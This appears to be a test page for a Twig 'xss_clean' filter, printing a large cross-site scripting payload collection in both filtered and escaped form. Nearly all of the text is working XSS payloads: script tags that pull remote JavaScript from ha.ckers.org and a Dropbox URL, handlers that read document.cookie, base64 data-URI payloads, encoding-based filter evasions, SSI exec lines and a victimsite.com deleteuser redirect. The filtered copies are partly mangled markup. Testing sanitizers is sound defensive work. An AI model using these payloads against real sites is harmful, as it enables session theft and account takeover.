result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<INPUT TYPE="IMAGE" SRC="alert((515)S');"> <BODY BACKGROUND="alert((516)S')"> <STYLE>li {list-style-image: url("alert((519)S')");}</STYLE><UL>
  • XSS
    <BODY > <BGSOUND SRC="alert((521)S');">
    <LINK REL="stylesheet" HREF="alert((523)S');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert((501)S")';</STYLE> > & TYPE="text/javascript" > <STYLE type="text/css">BODY{background:url("alert((527)S')")}</STYLE> <STYLE type="text/css">BODY{background:url("alert((528)S')")}</STYLE> <META HTTP-EQUIV="refresh" CONTENT="0;url=alert((530)S');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=alert((531)S');"> <IFRAME SRC="alert((532)S');"></IFRAME> <IFRAME SRC=# ></IFRAME> <FRAMESET><FRAME SRC="alert((533)S');"></FRAMESET>
    <BASE HREF="alert((539)S');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> '"--> <? echo('alert((503)S") Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID="> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD> " SRC="http://ha.ckers.org/xss.js"> " '' SRC="http://ha.ckers.org/xss.js">" SRC="http://ha.ckers.org/xss.js">XSS XSS XSS XSS XSS XSS <iframe src=" prompt(438) " > <svg><style>{font-family:'<iframe/>' <input/ <sVg><isindex <img src='https://dl.dropbox.com/u/13018058/js.js'>"> <meta content=" 1 ; alert(447)" http-equiv="refresh"/> <svg> <iframe src=javascript:alert(document.location)> <form><a href="">X <>< src=""> X ="> & > '> < href="">X <style/> <///style///><span %2F >SPAN <style>{-o-link-source:'<body/>' <blink/ > {Firefox & Opera} ^__^
    X
    {IE7} <iframe/ / src=javaSCRIPT:alert(457) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/ /*iframe/src*/> //|\\ //|\\ /<svg><style>{src:'<style/>'</font>/</style> <a/href=""><input type="X"> </plaintext\></|\><plaintext/ </svg>''<svg>alert(1) {Opera} <a href=""><button> <div >DIV</div> <iframe > <a href="">X</a>

    result with twig: {{ xss.xss | escape }}:

    <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert((513)S')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert((514)S');// </TITLE><SCRIPT>alert((499)S");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert((515)S');"> <BODY BACKGROUND="javascript:alert((516)S')"> <IMG DYNSRC="javascript:alert((517)S')"> <IMG LOWSRC="javascript:alert((518)S')"> <STYLE>li {list-style-image: url("javascript:alert((519)S')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox((500)S")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert((520)S')> <BGSOUND SRC="javascript:alert((521)S');"> <BR SIZE="&{alert((522)S')}"> <LINK REL="stylesheet" HREF="javascript:alert((523)S');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert((501)S")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert((524)S'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert((502)S"))'> <STYLE TYPE="text/javascript">alert((525)S');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert((526)S')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert((527)S')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert((528)S')")}</STYLE> <XSS STYLE="xss:expression(alert((529)S'))"> <XSS STYLE="behavior: url(xss.htc);"> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert((530)S');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert((531)S');"> <IFRAME SRC="javascript:alert((532)S');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert((533)S');"></FRAMESET> <TABLE BACKGROUND="javascript:alert((534)S')"> <TABLE><TD BACKGROUND="javascript:alert((535)S')"> <DIV STYLE="background-image: url(javascript:alert((536)S'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert((537)S'))"> <DIV STYLE="width: expression(alert((538)S'));"> <BASE HREF="javascript:alert((539)S');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert((503)S")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert((540)S')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert((541)S');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <iframe %00 src="&Tab;javascript:prompt(438)&Tab;"%00> <svg><style>{font-family&colon;'<iframe/onload=confirm(439)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt %00>alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(440) <form><isindex formaction="javascript&colon;confirm(441)" <img src=`%00`&NewLine; onerror=alert(442)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(443)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(444)/*%00*/</script /*%00*/ &#34;&#62;<h1/onmouseover='\u0061lert(445)'>%00 <iframe/src="data:text/html,<svg &#111;&#110;load=alert(446)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(447)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(448)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert&#x28;1&#x29;">X </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> <img/&#09;&#10;&#11; src=`~` onerror=prompt(449)> <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(450)"&#11;&#10;&#09;;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a http://www.google<script .com>alert(document.location)</script <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror = prompt('&#49;') <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( &#00;</form><input type&#61;"date" onfocus="alert(451)"> <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(452)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(453) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(454)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(455)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(456))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(457) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(458) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(459)>'</font>/</style> <a/href="javascript:&#13; javascript:prompt(460)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(461) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(462)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:10:39

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    <INPUT TYPE="IMAGE" SRC="alert((515)S');"> <BODY BACKGROUND="alert((516)S')"> <STYLE>li {list-style-image: url("alert((519)S')");}</STYLE><UL>
  • XSS
    <BODY > <BGSOUND SRC="alert((521)S');">
    <LINK REL="stylesheet" HREF="alert((523)S');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert((501)S")';</STYLE> > & TYPE="text/javascript" > <STYLE type="text/css">BODY{background:url("alert((527)S')")}</STYLE> <STYLE type="text/css">BODY{background:url("alert((528)S')")}</STYLE> <META HTTP-EQUIV="refresh" CONTENT="0;url=alert((530)S');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=alert((531)S');"> <IFRAME SRC="alert((532)S');"></IFRAME> <IFRAME SRC=# ></IFRAME> <FRAMESET><FRAME SRC="alert((533)S');"></FRAMESET>
    <BASE HREF="alert((539)S');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> '"--> <? echo('alert((503)S") Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID="> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD> " SRC="http://ha.ckers.org/xss.js"> " '' SRC="http://ha.ckers.org/xss.js">" SRC="http://ha.ckers.org/xss.js">XSS XSS XSS XSS XSS XSS <iframe src=" prompt(438) " > <svg><style>{font-family:'<iframe/>' <input/ <sVg><isindex <img src='https://dl.dropbox.com/u/13018058/js.js'></object> <iframe src="data:text/html,"></iframe> Click Me

    result with twig: {{ xss.xss | escape }}:

    <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert((513)S')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert((514)S');// </TITLE><SCRIPT>alert((499)S");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert((515)S');"> <BODY BACKGROUND="javascript:alert((516)S')"> <IMG DYNSRC="javascript:alert((517)S')"> <IMG LOWSRC="javascript:alert((518)S')"> <STYLE>li {list-style-image: url("javascript:alert((519)S')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox((500)S")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert((520)S')> <BGSOUND SRC="javascript:alert((521)S');"> <BR SIZE="&{alert((522)S')}"> <LINK REL="stylesheet" HREF="javascript:alert((523)S');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert((501)S")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert((524)S'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert((502)S"))'> <STYLE TYPE="text/javascript">alert((525)S');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert((526)S')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert((527)S')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert((528)S')")}</STYLE> <XSS STYLE="xss:expression(alert((529)S'))"> <XSS STYLE="behavior: url(xss.htc);"> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert((530)S');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert((531)S');"> <IFRAME SRC="javascript:alert((532)S');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert((533)S');"></FRAMESET> <TABLE BACKGROUND="javascript:alert((534)S')"> <TABLE><TD BACKGROUND="javascript:alert((535)S')"> <DIV STYLE="background-image: url(javascript:alert((536)S'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert((537)S'))"> <DIV STYLE="width: expression(alert((538)S'));"> <BASE HREF="javascript:alert((539)S');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert((503)S")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert((540)S')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert((541)S');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <iframe %00 src="&Tab;javascript:prompt(438)&Tab;"%00> <svg><style>{font-family&colon;'<iframe/onload=confirm(439)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt %00>alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(440) <form><isindex formaction="javascript&colon;confirm(441)" <img src=`%00`&NewLine; onerror=alert(442)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(443)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(444)/*%00*/</script /*%00*/ &#34;&#62;<h1/onmouseover='\u0061lert(445)'>%00 <iframe/src="data:text/html,<svg &#111;&#110;load=alert(446)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(447)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(448)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert&#x28;1&#x29;">X </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> <img/&#09;&#10;&#11; src=`~` onerror=prompt(449)> <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(450)"&#11;&#10;&#09;;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a http://www.google<script .com>alert(document.location)</script <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror = prompt('&#49;') <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( &#00;</form><input type&#61;"date" onfocus="alert(451)"> <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(452)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(453) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(454)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(455)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(456))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(457) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(458) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(459)>'</font>/</style> <a/href="javascript:&#13; javascript:prompt(460)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(461) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(462)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(463)">On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(464)'"> <%<!--'%><script>alert(465);</script --> <script src="data:text/javascript,alert(466)"></script> <iframe/src \/\/onload = prompt(467) <iframe/onreadystatechange=alert(468) <svg/onload=alert(469) <input value=<><iframe/src=javascript:confirm(470) <input type="text" value=`` <div/onmouseover='alert(471)'>X</div> http://www.<script>alert(472)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <svg><script ?>alert(473) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(474)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(475)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(476)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061&#x6C;&#101%72t(477)> <script>+-+-1-+-+alert(478)</script> <body/onload=&lt;!--&gt;&#10alert(479)> <script itworksinallbrowsers>/*<script* */alert(480)</script <img src ?itworksonchrome?\/onerror = alert(481) <svg><script>//&NewLine;confirm(482);</script </svg> <svg><script onlypossibleinopera:-)> alert(483) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(484)>ClickMe <script x> alert(485) </script 1=2 <div/onmouseover='alert(486)'> style="x:"> <--`<img/src=` 